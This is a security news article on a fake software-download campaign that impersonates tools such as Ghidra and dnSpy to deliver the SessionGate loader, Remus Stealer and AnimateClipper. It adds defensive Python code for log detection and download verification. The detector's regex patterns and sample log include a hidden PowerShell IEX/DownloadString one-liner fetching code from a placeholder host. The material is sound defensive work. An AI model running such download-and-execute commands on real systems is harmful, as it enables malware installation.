Cybersecurity researchers have uncovered a large-scale malware distribution operation that impersonates popular open-source and freeware projects to lure users into downloading malicious software. The campaign uses a sophisticated Traffic Distribution System (TDS) to selectively deliver malware while appearing legitimate to both users and security analysts.
Researchers at Check Point have identified a network of fake websites designed to mimic trusted software projects and security tools. These sites closely resemble legitimate project portals, making it difficult for users to distinguish them from authentic sources.
How the Campaign Works
At first glance, the fraudulent websites appear convincing and often include references to genuine project resources. However, the real deception begins when visitors attempt to download software.
When a user clicks a download button, a hidden JavaScript layer hosted through Amazon CloudFront intercepts the request and redirects the visitor through a Traffic Distribution System (TDS). This system evaluates the visitor using multiple filtering mechanisms before deciding what content to deliver.
The TDS employs several advanced techniques, including:
- First-visit verification
- Mandatory user interaction checks
- Anti-bot and anti-analysis protections
- VPN and data center detection
- Frequency-based access controls
These measures help attackers single out real, interactive users while steering automated security tools and researchers away from the malicious payload.
Trusted Software Brands Being Abused
The campaign targets individuals searching for popular security and reverse-engineering tools online. Some of the fake websites have been found impersonating well-known projects such as:
- Ghidra
- dnSpy
- SpiderFoot
Attackers use search engine optimization (SEO) techniques to push these fraudulent sites toward the top of search engine results, sometimes outranking the legitimate project websites.
Researchers believe the operation has been active since September 2025. Earlier investigations suggested the sites were primarily used for traffic generation and advertising revenue. However, evidence now indicates the infrastructure was repurposed for malware distribution beginning in January 2026.
A Deceptive Download Experience
One particularly deceptive tactic involves displaying legitimate download URLs when users hover over download buttons. This creates a false sense of trust and makes the website appear authentic.
Once clicked, however, users are redirected through a carefully controlled chain of servers that ultimately delivers malware.
The infrastructure is also designed to behave differently depending on the visitor. Users attempting repeated downloads from the same IP address may receive harmless software such as browser installers or extensions, making detection and analysis more difficult.
Malware Families Distributed Through the Campaign
Researchers identified several malware families being delivered through the TDS infrastructure.
SessionGate
SessionGate is a newly discovered multi-stage malware loader that serves as the foundation of the operation.
Key capabilities include:
- Multi-layer obfuscation
- Advanced anti-analysis protections
- Sandbox evasion techniques
- Delivery of potentially unwanted applications (PUAs)
- Selective malware deployment
The framework can redirect security researchers to harmless software installations while reserving malicious payloads for targeted victims.
Remus Stealer
Remus Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) model.
Its capabilities include:
- Theft of browser credentials
- Cookie extraction
- Data collection from more than 20 browsers
- Targeting cryptocurrency wallets
- Accessing password managers
- Harvesting two-factor authentication data
Researchers believe Remus Stealer may be a variant of the well-known Lumma Stealer family.
AnimateClipper
AnimateClipper is a cryptocurrency-focused malware strain designed to hijack financial transactions.
The malware monitors clipboard activity and replaces copied cryptocurrency wallet addresses with attacker-controlled addresses before funds are transferred.
According to researchers, AnimateClipper supports more than 20 blockchain ecosystems and is often delivered through social engineering techniques known as ClickFix attacks.
Global Impact
Analysis of security telemetry has revealed between 2,000 and 3,500 malware submissions linked to SessionGate. The majority of detections have originated from:
- Turkey
- Poland
- Brazil
- Germany
- France
- Russia
- United Kingdom
The malware delivery process is highly dynamic, with payloads customized for individual victims after successfully navigating the entire redirection chain.
Why This Campaign Is Dangerous
The final malware delivery stage involves downloading encrypted configurations from remote servers, extracting hidden payload URLs, and silently executing additional malware using Windows command-line processes.
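The telemetry that catches this last stage is process creation: a freshly downloaded installer spawning a command-line interpreter whose arguments fetch or decode remote content and run it. The following detection logic is an added example written for this article, not code from the Check Point report or from any of the malware families it describes; the log format (tab-separated key=value, loosely modelled on Sysmon Event ID 1 fields) and every sample line are constructed. Each heuristic alone is noisy, so an event is flagged only when all three agree.

```python
"""Added example: flag download-and-execute chains in process-creation logs.

Not from the original report. The log format and sample lines are constructed;
the regexes are generic and not tied to any specific malware family.
"""
import re
from dataclasses import dataclass

# Command-line interpreters the loader stage is described as abusing.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "mshta.exe"}

# Parent executables living where a just-downloaded installer would land.
USER_WRITABLE = re.compile(r"\\(downloads|temp|tmp|appdata\\local\\temp)\\", re.IGNORECASE)

# Fragments that fetch, decode, or execute remote content from a one-liner.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b|"
    r"certutil.*-urlcache|bitsadmin.*/transfer|\bcurl\b.*-o\b|frombase64string|"
    r"-enc(odedcommand)?\b)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed record: 'ParentImage=..<TAB>Image=..<TAB>CommandLine=..'."""
    fields = dict(part.split("=", 1) for part in line.rstrip("\n").split("\t"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score(ev: ProcEvent) -> list:
    """Return the list of heuristics this event satisfies, in a fixed order."""
    reasons = []
    if basename(ev.image) in SHELLS:
        reasons.append("shell-interpreter")
    if USER_WRITABLE.search(ev.parent_image):
        reasons.append("parent-in-user-writable-path")
    if DOWNLOAD_EXEC.search(ev.command_line):
        reasons.append("download-or-exec-fragment")
    return reasons


def detect(lines):
    """Return (event, reasons) only for events that satisfy all three heuristics."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        reasons = score(ev)
        if len(reasons) == 3:
            hits.append((ev, reasons))
    return hits


# Constructed sample log. Line 1 is the pattern described in the text; the other
# three each trip one or two heuristics and are deliberately left unflagged.
SAMPLE_LOG = [
    "ParentImage=C:\\Users\\alice\\Downloads\\fake_tool_setup.exe\t"
    "Image=C:\\Windows\\System32\\cmd.exe\t"
    "CommandLine=cmd.exe /c powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://config-host.invalid/c')\"",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\cmd.exe\t"
    "CommandLine=cmd.exe /c dir",
    "ParentImage=C:\\Users\\alice\\Downloads\\legit_installer.exe\t"
    "Image=C:\\Windows\\System32\\msiexec.exe\tCommandLine=msiexec /i package.msi /qn",
    "ParentImage=C:\\Program Files\\Vendor\\updater.exe\t"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "CommandLine=powershell -c Invoke-WebRequest https://updates.example/manifest.json -OutFile m.json",
]

if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_LOG):
        print(f"FLAGGED {ev.parent_image} -> {ev.image}: {', '.join(reasons)}")
```

Tuning note: the fourth sample (a vendor updater under Program Files calling Invoke-WebRequest) shows why the parent-path heuristic matters; dropping it would turn every legitimate updater into an alert. Conversely, an installer that runs `cmd.exe /c dir` is not worth a ticket on its own.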
Researchers emphasize that while traffic monetization may be one objective, the infrastructure also provides an effective platform for cybercriminals to distribute malware selectively.
By combining search engine manipulation, realistic software portals, advanced traffic filtering, and targeted malware delivery, the operators have created a highly effective ecosystem that can generate revenue while simultaneously supporting cybercriminal operations.
Security Recommendations
To reduce the risk of infection, organizations and individual users should:
- Download software only from official project websites.
- Verify URLs before downloading tools.
- Use endpoint protection capable of detecting suspicious loaders.
- Monitor browser extensions and installed applications.
- Educate users about fake software download sites and phishing tactics.
- Verify software hashes whenever possible.
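Two of these recommendations, URL verification and hash verification, can be automated, and the hover-URL trick described earlier is the reason to check the URLs actually followed rather than the one shown on the button. The code below is an added example for this article, not code from Check Point or from any of the projects named above. The allowlist of official hosts, the redirect chains and the file bytes are constructed placeholders (`.invalid` hostnames); in practice the allowlist comes from the project's own documentation, and the redirect chain from the HTTP client's response history.

```python
"""Added example: check a download's redirect chain and SHA-256 before trusting it.

Not from the original article. OFFICIAL_HOSTS, the chains and the file contents
are constructed for illustration.
"""
import hashlib
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical allowlist of independently confirmed official hosts per tool.
OFFICIAL_HOSTS = {
    "example-tool": {"example-tool.invalid", "github.com"},
}


def host_allowed(url: str, allowed: set) -> bool:
    """True only for HTTPS URLs whose host is an allowed host or a subdomain of one.

    A suffix match on '.' + host blocks look-alikes such as
    'example-tool.invalid.attacker.invalid'.
    """
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == a or host.endswith("." + a) for a in allowed)


def chain_allowed(chain: list, allowed: set):
    """Check every hop of a redirect chain; returns (ok, first offending URL or None)."""
    for url in chain:
        if not host_allowed(url, allowed):
            return False, url
    return True, None


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_download(tool: str, chain: list, data: bytes, published_sha256: str) -> dict:
    """Combine both checks; a download is trusted only if chain_ok and hash_ok."""
    ok_chain, offender = chain_allowed(chain, OFFICIAL_HOSTS[tool])
    actual = sha256_hex(data)
    return {
        "chain_ok": ok_chain,
        "offending_url": offender,
        "hash_ok": actual == published_sha256.strip().lower(),
        "sha256": actual,
    }


# Constructed samples. GOOD_CHAIN stays on official hosts; BAD_CHAIN detours
# through an unrelated redirector after the first hop, as the text describes.
GOOD_CHAIN = [
    "https://example-tool.invalid/download",
    "https://github.com/example/example-tool/releases/download/v1.0/tool.zip",
]
BAD_CHAIN = [
    "https://example-tool.invalid/download",
    "https://redirector-hop.invalid/route?id=1",
    "https://mirror-host.invalid/tool.zip",
]
FILE_BYTES = b"constructed release archive contents"
PUBLISHED_SHA256 = sha256_hex(FILE_BYTES)   # stands in for the checksum on the project page
TAMPERED_BYTES = FILE_BYTES + b"\x00"

if __name__ == "__main__":
    print(verify_download("example-tool", GOOD_CHAIN, FILE_BYTES, PUBLISHED_SHA256))
    print(verify_download("example-tool", BAD_CHAIN, FILE_BYTES, PUBLISHED_SHA256))
    print(verify_download("example-tool", GOOD_CHAIN, TAMPERED_BYTES, PUBLISHED_SHA256))
```

The hash check is only as good as where the published checksum came from: if it is read from the same fake portal that served the file, both will match. Take it from the project's own release page or signed release metadata, reached by a URL that itself passes the allowlist.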
Conclusion
The discovery of this campaign highlights the growing sophistication of malware distribution networks. By exploiting trust in popular open-source projects and leveraging advanced traffic distribution systems, attackers can selectively target victims while remaining difficult to detect. Organizations should remain vigilant and ensure software is obtained only from verified and trusted sources.
